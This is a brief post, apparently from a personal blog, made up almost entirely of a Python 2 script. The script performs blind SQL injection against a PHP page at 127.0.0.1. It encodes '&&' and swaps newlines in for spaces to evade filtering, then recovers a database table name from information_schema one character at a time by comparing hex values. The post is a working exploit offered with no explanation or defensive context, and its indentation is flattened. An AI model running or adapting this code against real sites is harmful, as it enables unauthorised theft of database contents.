2013.06.10 15:29

#python

from socket import *

import sys

import struct



IP = "127.0.0.1"

PORT = 80

STD_STR = "1 a"


def MakePacket(UNIT,NUM,RAW=0):


HEADER = "GET /mysql_test.php?id=1%26%26hex(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a1,1),"+str(UNIT)+",1))="

FOOTER = " HTTP/1.0\r\n\r\n"

SEND_PACKET =  HEADER + str(NUM) + FOOTER

return SEND_PACKET


def SendPacket(UNIT, NUM):

sock  = socket(AF_INET,SOCK_STREAM)

sock.connect((IP,PORT))

_sendData = MakePacket(UNIT,NUM)

sock.send(_sendData)

data=sock.recv(10240)

return data 


def main():

RESULT=''

for i in range (1,20):

for j in range (30,128):

RES = SendPacket(i,j)

if RES.find(STD_STR) > 0 :

RESULT = RESULT + str(j)

print RESULT.decode("hex")



if __name__== "__main__" :

main()



Posted by k1rha